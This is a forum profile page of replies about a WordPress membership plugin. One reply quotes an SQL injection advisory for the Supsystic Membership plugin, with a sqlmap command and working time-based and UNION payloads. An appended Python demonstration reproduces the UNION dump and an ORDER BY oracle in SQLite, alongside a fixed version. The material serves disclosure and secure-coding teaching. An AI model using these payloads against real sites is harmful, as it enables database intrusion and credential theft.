kantholz93 (@kantholz93)

Forum Replies Created

Viewing 3 replies - 1 through 3 (of 3 total)

    kantholz93
    Participant

    @kantholz93

    I’ve implemented your solution and it works pretty well so far. Thanks again.

    When I go to the URL of a private forum (while not logged in) it just throws a 404. Can I somehow redirect the user to a login page?


    kantholz93
    Participant

    @kantholz93

    Thank you very much! I will implement and test it over the next few days, but your solution sounds just perfect!

    You saved me! Thanks. 🙂


    kantholz93
    Participant

    @kantholz93

    The plugin was (luckily) not installed. We had just decided to use it when we saw that WordPress had taken it down from their plugin site.

    The exploit seems to be an SQL Injection.

    # 1. Description

    The GET parameters "search" and "sidx" do not sanitize user input when searching for badges.

    # 2. Proof of Concept (PoC)

    Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
    Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index

    sqlmap -r request.txt --dbms=mysql -p search

    Parameter: search (GET)
    Type: time-based blind
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND 'trjK'='trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

    Type: UNION query
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL-- -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
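The advisory quoted in the post above names two injectable parameters, "search" and "sidx", and the sqlmap output only exercises "search". The following is an added example (not code from the plugin, the advisory, or the poster) that models the pattern the advisory describes with an in-memory SQLite database standing in for MySQL: a badge listing that concatenates both parameters into its query. It runs the UNION dump that corresponds to sqlmap's second payload (the 0x71786a6b71/0x716a7a6a71 constants are sqlmap's marker strings), shows why "sidx" is separately dangerous (ORDER BY cannot be bound as a parameter, so it works as a boolean oracle), and puts the fixed listing beside it. Table and column names, the allow-list of sort columns, and the sample rows are all assumptions constructed for the example; SLEEP() and CONCAT() are MySQL-only, so the payload uses || instead.

```python
import sqlite3

# Marker strings that sqlmap wraps around the injected column so it can find
# its data in the HTML response; the 0x71786a6b71 / 0x716a7a6a71 constants in
# the advisory's UNION payload decode to exactly these.
PREFIX = "qxjkq"
SUFFIX = "qjzjq"

# Columns a client may sort by (assumed). ORDER BY cannot take a bound
# parameter, so an identifier allow-list is the only safe way to handle sidx.
ALLOWED_SORT = ("id", "title", "created")

# Constructed schema and rows for this example; SQLite stands in for MySQL.
SCHEMA = """
CREATE TABLE badges (id INTEGER, title TEXT, image TEXT, created TEXT);
INSERT INTO badges VALUES (1, 'Gold',   'gold.png',   '2020-01-01');
INSERT INTO badges VALUES (2, 'Bronze', 'bronze.png', '2020-02-01');
CREATE TABLE users (id INTEGER, login TEXT, pass_hash TEXT);
INSERT INTO users VALUES (1, 'admin', '$P$Bnotarealhash');
"""

# SQLite stand-in for the advisory's UNION payload (|| instead of CONCAT, no
# MySQL 0x literals). It pulls the users table out through the badge listing.
UNION_PAYLOAD = (
    "s' UNION ALL SELECT NULL, '" + PREFIX + "' || login || ':' || pass_hash || '"
    + SUFFIX + "', NULL, NULL FROM users-- -"
)


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_list(con, search, sidx, sord="desc"):
    """Listing built by string concatenation: the pattern the advisory
    reports for the search and sidx GET parameters."""
    sql = (
        "SELECT id, title, image, created FROM badges "
        "WHERE title LIKE '%" + search + "%' "
        "ORDER BY " + sidx + " " + sord
    )
    return con.execute(sql).fetchall()


def safe_list(con, search, sidx, sord="desc"):
    """Same listing with the value bound and the identifiers allow-listed."""
    if sidx not in ALLOWED_SORT:
        raise ValueError("rejected sort column: %r" % sidx)
    if sord.lower() not in ("asc", "desc"):
        raise ValueError("rejected sort order: %r" % sord)
    sql = (
        "SELECT id, title, image, created FROM badges "
        "WHERE title LIKE ? ORDER BY %s %s" % (sidx, sord)
    )
    return con.execute(sql, ("%" + search + "%",)).fetchall()


def extract_marked(rows):
    """Pull sqlmap-style PREFIX...SUFFIX data out of a result set."""
    found = []
    for row in rows:
        for cell in row:
            if isinstance(cell, str) and cell.startswith(PREFIX) and cell.endswith(SUFFIX):
                found.append(cell[len(PREFIX):-len(SUFFIX)])
    return found


def dump_users_via_union(con):
    """UNION injection through search on the vulnerable listing."""
    return extract_marked(vulnerable_list(con, UNION_PAYLOAD, "id"))


def sidx_oracle(con, condition):
    """Boolean oracle through sidx: the sort key is picked by a CASE over an
    attacker-chosen subquery, so the row order leaks whether condition holds
    (id ASC puts Gold=1 first; title ASC puts Bronze=2 first)."""
    sidx = "(CASE WHEN (%s) THEN id ELSE title END)" % condition
    rows = vulnerable_list(con, "", sidx, "asc")
    return rows[0][0] == 1


def safe_rejects_sidx(con, sidx):
    """True if the hardened listing refuses the given sort column."""
    try:
        safe_list(con, "", sidx)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("union dump      :", dump_users_via_union(db))
    print("oracle, true    :", sidx_oracle(db, "(SELECT substr(login,1,1) FROM users)='a'"))
    print("oracle, false   :", sidx_oracle(db, "(SELECT substr(login,1,1) FROM users)='z'"))
    print("safe, same input:", safe_list(db, UNION_PAYLOAD, "id"))
    print("safe rejects    :", safe_rejects_sidx(db, "(CASE WHEN 1=1 THEN id ELSE title END)"))
```

The point of the oracle function is that the second parameter needs a different fix from the first: binding `search` as a parameter removes the UNION and time-based vectors, but `sidx` lands in an identifier position, so the only defence is to compare it against a fixed list of column names before it ever reaches the query string.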
